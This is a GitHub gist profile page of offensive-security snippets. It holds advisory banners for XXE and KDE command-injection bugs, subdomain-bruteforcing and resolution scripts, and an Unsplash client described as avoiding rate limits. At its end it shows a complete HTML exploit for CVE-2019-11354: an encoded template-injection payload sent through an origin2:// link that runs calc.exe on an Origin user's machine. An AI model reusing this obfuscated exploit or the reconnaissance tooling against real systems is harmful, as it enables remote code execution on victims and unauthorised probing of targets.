Skip to content

Instantly share code, notes, and snippets.

View zeropwn's full-sized avatar
👻
Writing scary code.

Dominik zeropwn

👻
Writing scary code.
107 followers · 15 following
View GitHub Profile
@zeropwn
zeropwn / Axway SecureTransport 5.x Unauthenticated XXE
Last active November 17, 2023 08:59
Axway SecureTransport 5.x Unauthenticated XML Injection / XXE
_ _
_______ _ __ ___ | | ___ | |
|_ / _ \ '__/ _ \ | |/ _ \| |
/ / __/ | | (_) || | (_) | |
/___\___|_| \___(_)_|\___/|_|
https://zero.lol
zero days 4 days
ATTENTION:
@zeropwn
zeropwn / run.js
Created August 8, 2019 16:48 — forked from marzavec/run.js
Browser-based subdomain bruteforcing using DNS over HTTP(s) (DoH)
/*
Developer: Marzavec ( https://github.com/marzavec )
Description: A simple browser-based subdomain bruteforcing script, using DoH providers. Developed as a 5 minute hack, just to see it's preformance. Many improvements could be made, such as adding error handling or informing the user when the script is done.
Usage: Open the browsers dev console (usually F12), paste this script, change the `rootTld`, press enter to run. Ezpz.
*/
const rootTld = 'lyka.pro'; // change to your target's root tld
// url to newline seperated wordlist
const wordlistUrl = 'https://raw.githubusercontent.com/rbsec/dnscan/master/subdomains.txt';
@zeropwn
zeropwn / kde-kdesktopfile-command-injection.txt
Created August 5, 2019 00:04
KDE 4/5 is vulnerable to a command injection vulnerability in the KDesktopFile class.
_ _
_______ _ __ ___ | | ___ | |
|_ / _ \ '__/ _ \ | |/ _ \| |
/ / __/ | | (_) || | (_) | |
/___\___|_| \___(_)_|\___/|_|
https://zero.lol
zero days 4 days
Title: KDE 4/5 KDesktopFile Command Injection
Date: July 28th 2019
@zeropwn
zeropwn / spyse-resolve.sh
Last active June 21, 2019 23:26
Resolve all hosts returned by spyse.
#!/bin/bash
# requires
# https://github.com/zeropwn/spyse.py
DOMAINS_LOC=/tmp/subdomains.txt
spyse -target $1 -param domain --sub > $DOMAINS_LOC;
domains=`cat $DOMAINS_LOC | sed '1,12d'`
for d in $domains;
do
getent hosts $d | awk '{print $1}'
done
@zeropwn
zeropwn / unsplash.py
Created June 3, 2019 01:05
Non-Ratelimited Unsplash.com Image Search Client
#!/usr/bin/python3
import json
import requests
import argparse
import urllib.parse
SEARCH_URL = "https://unsplash.com/napi/search/photos"
p = argparse.ArgumentParser(description="Non-Ratelimited Unsplash API Client")
p.add_argument('-s', help="search query")
@zeropwn
zeropwn / CVE-2019-11354-BYPASS.html
Created May 23, 2019 04:47
<script>
// pop calc.exe
var payload = '%u007b%u007b%u0061%u003d%u0074%u006f%u0053%u0074%u0072%u0069%u006e%u0067%u0028%u0029%u002e%u0063%u006f%u006e%u0073%u0074%u0072%u0075%u0063%u0074%u006f%u0072%u002e%u0070%u0072%u006f%u0074%u006f%u0074%u0079%u0070%u0065%u003b%u0061%u002e%u0063%u0068%u0061%u0072%u0041%u0074%u003d%u0061%u002e%u0074%u0072%u0069%u006d%u003b%u0024%u0065%u0076%u0061%u006c%u0028%u0027%u0061%u002c%u004f%u0072%u0069%u0067%u0069%u006e%u002e%u0063%u006c%u0069%u0065%u006e%u0074%u002e%u0064%u0065%u0073%u006b%u0074%u006f%u0070%u0053%u0065%u0072%u0076%u0069%u0063%u0065%u0073%u002e%u0061%u0073%u0079%u006e%u0063%u004f%u0070%u0065%u006e%u0055%u0072%u006c%u0028%u0022%u0063%u0061%u006c%u0063%u002e%u0065%u0078%u0065%u0022%u0029%u002c%u0061%u0027%u0029%u007d%u007d';
window.location = 'origin2://game/launch?offerIds=0&title='+payload;
</script>